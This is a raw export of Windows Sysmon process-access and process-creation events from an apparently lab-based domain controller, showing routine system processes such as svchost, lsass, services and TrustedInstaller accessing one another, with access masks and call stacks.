13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.102{59A5CD1D-8E44-6005-0A00-00000000A301}8481960C:\Windows\system32\services.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.106{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000009869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.102{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 